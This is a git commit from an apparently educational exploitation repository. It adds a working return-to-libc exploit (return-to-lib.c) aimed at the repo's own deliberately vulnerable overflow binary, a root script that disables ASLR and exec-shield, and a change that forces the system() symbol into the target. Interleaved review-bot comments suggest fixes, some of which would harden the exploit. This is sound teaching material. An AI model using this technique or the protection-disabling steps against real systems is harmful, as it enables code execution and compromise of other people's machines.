authorToni Uhlig <matzeton@googlemail.com>2021-02-10 18:14:42 +0100
committerToni Uhlig <matzeton@googlemail.com>2021-02-10 18:14:42 +0100
commit9b466b6a81149e0f6aa80b4d27f403753a9b1f8c (patch)
tree75f5a9a7c8e89cdf18fc92a8b07c196b16c59ffa
parentab20c0321d90f055dd999c03bd83cbd01c3788f9 (diff)
return-to-lib.c exploit example as requested by a user
Signed-off-by: Toni Uhlig <matzeton@googlemail.com>
-rw-r--r--.gitignore2
-rwxr-xr-xdisable_prot.sh8
-rw-r--r--overflow.c5
-rw-r--r--return-to-lib.c83
4 files changed, 93 insertions, 5 deletions
diff --git a/.gitignore b/.gitignore
index 6cdf807..33c8209 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,5 +1,7 @@
*.swp
*.o
+*.exe
+return-to-lib
overflow
overflow_x64
overflow_tcp
diff --git a/disable_prot.sh b/disable_prot.sh
index e33fe14..712ca66 100755
--- a/disable_prot.sh
+++ b/disable_prot.sh
@@ -3,7 +3,7 @@
if [ `id -u` -ne 0 ]; then
echo "$0: This script should be run as root."
echo "$0: Try to get root .."
- su -l root -c "$(readlink -f $0)"
+ sudo "$(readlink -f $0)"
exit $?
fi
@@ -11,10 +11,10 @@ cat /proc/cpuinfo | grep -oq pae 2>/dev/null >/dev/null
ret=$?
if [ $ret -eq 0 ]; then
echo "$0: PAE enabled system found."
- echo "$0: Some exploits will not work!"
+ echo "$0: Some exploits may not work!"
fi
set -x
-sysctl -w kernel.randomize_va_space=0
-sysctl -w kernel.exec-shield=0
+sysctl -w kernel.randomize_va_space=0 2>/dev/null
+sysctl -w kernel.exec-shield=0 2>/dev/null
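Review bot: Silencing stderr on the `kernel.randomize_va_space` line at the end of the second hunk hides the one failure this script exists to report: if the write is rejected (read-only /proc/sys inside a container, insufficient privilege after the sudo re-exec), the script still exits 0 and the overflow examples later fail with no visible cause. The redirect is presumably there for `kernel.exec-shield`, which is not a key on mainline kernels, so only that line needs it. I'd check the first write and keep the suppression on the second: `sysctl -w kernel.randomize_va_space=0 || { echo "$0: could not disable ASLR" >&2; exit 1; }` and `sysctl -w kernel.exec-shield=0 2>/dev/null || true`. The first hunk has the same unquoted-`$0` issue in `readlink -f $0`: a path containing spaces is word-split, so it should read `sudo "$(readlink -f "$0")"`.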
diff --git a/overflow.c b/overflow.c
index 1d9e4cf..07dc8ab 100644
--- a/overflow.c
+++ b/overflow.c
@@ -9,7 +9,6 @@
#include <stdio.h>
#include <string.h>
-/* 300 bytes buffer len + 4 bytes for overwrite return opcode */
#define BUFLEN 300
void
@@ -24,6 +23,10 @@ overflow(const char *src)
int
main(int argc, char **argv)
{
+ /* force system() symbol import for return-to-lib.c exploitation */
+ void * system_fn = system;
+ (void)system_fn;
+
if (argc > 1) {
overflow(argv[1]);
} else {
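Review bot: `void * system_fn = system;` in the added lines converts a function pointer to an object pointer, which ISO C does not define (GCC accepts it, but `-Wpedantic` warns); a typed function pointer keeps the symbol referenced without the conversion: `int (*system_fn)(const char *) = system;` followed by the existing `(void)system_fn;`. The context in the first hunk shows only `<stdio.h>` and `<string.h>` being included, so unless `<stdlib.h>` is pulled in above line 9 of the file, `system` is also an implicit declaration here — worth confirming. main() continues past the end of the hunk.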
diff --git a/return-to-lib.c b/return-to-lib.c
new file mode 100644
index 0000000..3f0acba
--- /dev/null
+++ b/return-to-lib.c
@@ -0,0 +1,83 @@
+#include <libgen.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#define BUFLEN 300
+
+static void hexdump(void * buf, size_t siz)
+{
+ for (size_t i = 0; i < siz; ++i)
+ {
+ printf("0x%02X ", ((unsigned char *)buf)[i]);
+ if ((i+1) % 10 == 0) printf("\n");
+ }
+}
+
+static char *
+run_command_and_capture_output(char const * const cmd)
+{
+ FILE *fp;
+ char output[BUFSIZ];
+
+ fp = popen(cmd, "r");
+ if (fp == NULL) {
+ return NULL;
+ }
+ if (fgets(output, sizeof(output), fp) != NULL) {
+ return strdup(output);
+ }
+ pclose(fp);
+
+ return NULL;
+}
+
+int main(int argc, char ** argv)
+{
+ char * mydir;
+ char * system_fn_as_str;
+ size_t * system_fn = (size_t *)0xDEADC0DE;
+ char cmd_get_system_fn[BUFSIZ];
+ char path_to_overflow[BUFSIZ];
+ char exploit_buffer[BUFLEN + 4 /* saved ebp (stack frame of the calling fn) */
+ + 4 /* return address -> address of system() */
+ + 4 + 4 /* first argument for system() */];
+
+ if (argc != 1)
+ {
+ exit(1);
+ }
+ mydir = dirname(strdup(argv[0]));
+
+ snprintf(cmd_get_system_fn, sizeof(cmd_get_system_fn),
+ "nm %s/overflow | grep 'W system' | cut -d ' ' -f 1", mydir);
+ printf("Executing $(%s) to get address of system()\n", cmd_get_system_fn);
+ system_fn_as_str = run_command_and_capture_output(cmd_get_system_fn);
+ if (system_fn_as_str == NULL)
+ {
+ printf("Could not retrieve system() address.\n");
+ exit(1);
+ }
+ system_fn = (size_t *)strtoul(system_fn_as_str, NULL, 16);
+
+ snprintf(path_to_overflow, sizeof(path_to_overflow), "%s/%s",
+ mydir, "overflow");
+ printf("Exec......: %s\n"
+ "system()..: %p\n"
+ "env(SHELL): %p\n",
+ path_to_overflow, system_fn, getenv("SHELL"));
+
+ memset(exploit_buffer, 'A', sizeof(exploit_buffer));
+ *(size_t **)&exploit_buffer[BUFLEN + 4] = system_fn;
+ *(size_t **)&exploit_buffer[BUFLEN + 4 + 4 + 4] = (size_t *)(getenv("SHELL") + strlen("SHELL"));
+
+ printf("\nexploit buffer:\n");
+ hexdump(exploit_buffer, sizeof(exploit_buffer));
+ printf("\n\n");
+
+ printf("All set up, let's have some fun.\n"
+ "Executing %s with exploit buffer as argv[1]\n",
+ path_to_overflow);
+ execl(path_to_overflow, path_to_overflow, exploit_buffer, NULL);
+}
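Review bot: `run_command_and_capture_output` leaks the popen() stream on its success path: when fgets() succeeds it returns `strdup(output)` before the `pclose(fp)` line is reached, so the child is never reaped. Capture first, close unconditionally, then return: `char *result = fgets(output, sizeof(output), fp) != NULL ? strdup(output) : NULL;` / `pclose(fp);` / `return result;`. In main(), the two stores through `(size_t **)` write `sizeof(void *)` bytes while the offsets and the comments on `exploit_buffer` assume 4-byte pointers, so on an LP64 build the second store ends 4 bytes past the 316-byte array; a `_Static_assert(sizeof(void *) == 4, "return-to-lib.c assumes a 32-bit build");` next to `BUFLEN` would make that a compile error instead of silent corruption. `getenv("SHELL")` is used in pointer arithmetic without a NULL check (NULL plus an offset is undefined), and `execl` only returns on failure, so main should end with `perror("execl"); return 1;` rather than falling off the end without a diagnostic.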